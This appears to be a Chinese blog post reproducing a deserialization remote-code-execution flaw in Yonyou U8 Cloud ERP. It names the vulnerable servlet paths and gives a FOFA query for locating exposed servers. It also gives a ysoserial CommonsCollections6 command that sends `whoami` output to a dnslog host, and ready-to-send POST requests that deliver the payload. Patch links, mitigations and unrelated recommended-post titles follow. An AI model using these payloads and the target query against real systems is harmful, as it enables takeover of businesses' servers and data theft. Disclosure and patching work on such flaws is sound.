用友U8 Cloud 反序列化RCE漏洞复现

0x01 产品简介

用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。

0x02 漏洞概述

用友U8 Cloud存在多处(FileManageServlet和LoginVideoServlet)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,最终造成远程代码执行。

0x03 影响范围

用友U8 Cloud 所有版本

0x04 复现环境

FOFA:app="用友-U8-Cloud"

0x05 漏洞复现

两处接口的反序列化漏洞路径:

复制代码
/servlet/~uap/nc.impl.pub.filesystem.FileManageServlet
/servlet/~uap/nc.bs.sm.login2.LoginVideoServlet

PS:用友的反序列化漏洞大部分cc6就可以直接打,post请求传入反序列化的二进制数据 就可以进行命令执行,ysoserial工具集成了多种cc链,感兴趣的可以研究研究

工具地址:https://github.com/frohoff/ysoserial/releases/tag/v0.0.6

构造序列化数据(jdk1.8)

复制代码
java -jar ysoserial-all.jar CommonsCollections6 "ping `whoami`.l4z6nq7x.dnslog.pw" >4.ser

PoC

复制代码
POST /servlet/~uap/nc.impl.pub.filesystem.FileManageServlet HTTP/1.1
Host: your-ip
Content-Type: *

{{file(C:\Users\m1813\Desktop\4.ser)}}

POST /servlet/~uap/nc.bs.sm.login2.LoginVideoServlet HTTP/1.1
Host: your-ip
Content-Type: *

{{file(C:\Users\m1813\Desktop\4.ser)}}

PS:里面生成序列化数据文件的路径自行修改

两个路径都可以打,自行测试

0x06 修复建议

官方修复方案

用友安全中心已发布官方补丁:

https://security.yonyou.com/#/noticeInfo?id=400

https://security.yonyou.com/#/noticeInfo?id=399

临时修复方案:

使用ACL网络策略限制访问来源;

使用防护类设备对/servlet/~uap/nc.impl.pub.filesystem.FileManageServlet和/servlet/~uap/nc.bs.sm.login2.LoginVideoServlet路径进行防护。

相关推荐
爱蛙科技8 小时前
近红外应用 | 通过光谱分析,360°测试鉴定苹果
安全
Hacker_seagull8 小时前
青少年CTF练习平台~Upload3
网络安全
小北方城市网8 小时前
微服务注册中心与配置中心实战(Nacos 版):实现服务治理与配置统一
人工智能·后端·安全·职场和发展·wpf·restful
轻造科技8 小时前
设备点检系统+移动端APP:替代纸质点检表,漏检率降为0
网络·安全·web安全
pingao1413788 小时前
预警先行,安全随行——道路气象监测站守护每一段旅程
安全
IT 行者9 小时前
Claude之父AI编程技巧十:安全最佳实践——安全与效率的平衡艺术
安全·ai编程
内心如初9 小时前
03_等保系列之1.0和2.0对比
网络安全·等保测评·等保测评从0-1·等保测评笔记
内心如初13 小时前
04_等保系列之云等保
网络安全·等保测评·等保测评从0-1·等保测评笔记
蝎蟹居13 小时前
GBT 4706.1-2024逐句解读系列(29) 第7.9~7.10条款:开关,档位应明确标识
人工智能·单片机·嵌入式硬件·物联网·安全
北辰当尹13 小时前
第27天 安全开发-PHP应用&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
android·安全·php